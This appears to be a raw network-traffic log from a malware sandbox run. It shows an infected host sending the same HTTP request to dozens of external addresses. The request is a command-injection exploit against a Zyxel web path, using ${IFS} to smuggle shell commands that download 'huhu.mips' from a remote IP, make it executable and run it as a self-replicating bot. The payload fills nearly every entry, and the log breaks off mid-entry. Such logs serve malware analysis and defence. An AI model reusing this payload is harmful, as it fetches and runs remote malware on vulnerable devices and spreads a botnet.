                                      Jan 19, 2024 17:29:20.539308071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1363192.168.2.143371863.196.212.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539352894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1364192.168.2.1439764183.55.184.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539396048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1365192.168.2.1454302222.66.141.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539452076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1366192.168.2.1456154124.55.44.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539499044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1367192.168.2.1434888187.78.192.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539532900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1368192.168.2.1451860162.30.149.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539561033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1369192.168.2.144611040.110.72.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539628983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1370192.168.2.1453290168.185.35.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539671898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1371192.168.2.145922451.178.78.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539707899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1372192.168.2.1435014144.224.160.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539741039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1373192.168.2.145933257.217.248.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539779902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1374192.168.2.1455858182.69.225.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539807081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1375192.168.2.1449830105.167.174.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539866924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1376192.168.2.1434820206.129.104.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539900064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1377192.168.2.143346637.107.32.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539921999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1378192.168.2.1459438139.138.33.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539983034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1379192.168.2.144297482.211.28.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540030003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1380192.168.2.1455200144.31.70.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540105104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1381192.168.2.14459009.86.6.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540105104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1382192.168.2.143654261.180.95.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540148973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1383192.168.2.143799232.10.217.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540215015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1384192.168.2.1455972158.143.214.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540241957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1385192.168.2.1439136173.149.128.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540273905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1386192.168.2.143716414.127.126.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540316105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1387192.168.2.143860685.18.87.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540369034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1388192.168.2.143761677.64.243.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540395975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1389192.168.2.144261432.245.224.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540462971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1390192.168.2.145023085.150.210.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540471077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1391192.168.2.1442740161.182.132.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540509939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1392192.168.2.1435050211.89.221.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540556908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1393192.168.2.1436356198.113.247.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540591955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1394192.168.2.1450908179.149.50.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540666103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1395192.168.2.1446676180.84.42.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540715933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1396192.168.2.143373051.205.115.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540739059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1397192.168.2.1440756164.129.40.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540782928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1398192.168.2.1439220181.249.112.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540822029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1399192.168.2.145974492.121.132.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540865898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1400192.168.2.145067694.115.49.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540905952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1401192.168.2.1455690190.4.42.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540951014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1402192.168.2.1451430139.111.72.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.540992022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1403192.168.2.1438408148.144.78.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541009903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1404192.168.2.1459334196.128.54.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541049004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1405192.168.2.1443088201.23.99.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541112900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1406192.168.2.1446496206.229.38.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541161060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1407192.168.2.144451875.138.244.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541199923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1408192.168.2.1439420149.158.242.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541222095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1409192.168.2.1434120102.89.183.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541419029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1410192.168.2.1455198201.177.7.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541450977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1411192.168.2.1460818161.218.44.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541501045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1412192.168.2.1442840152.180.20.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541544914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1413192.168.2.1436634128.199.74.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541587114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1414192.168.2.1443340160.131.192.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541618109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1415192.168.2.144028034.73.131.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541647911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1416192.168.2.1454216103.94.6.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541696072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1417192.168.2.1441522139.20.245.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541732073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1418192.168.2.144909881.84.210.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541776896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1419192.168.2.1452218207.201.43.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541806936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1420192.168.2.144822082.233.129.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541852951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1421192.168.2.1442114143.179.226.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541898012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1422192.168.2.144600654.173.132.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541948080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1423192.168.2.1448058186.48.35.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.541977882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1424192.168.2.143637220.39.168.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542033911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1425192.168.2.144150693.254.13.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542074919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1426192.168.2.1445702206.52.65.188443
                                      TimestampBytes transferredDirectionData
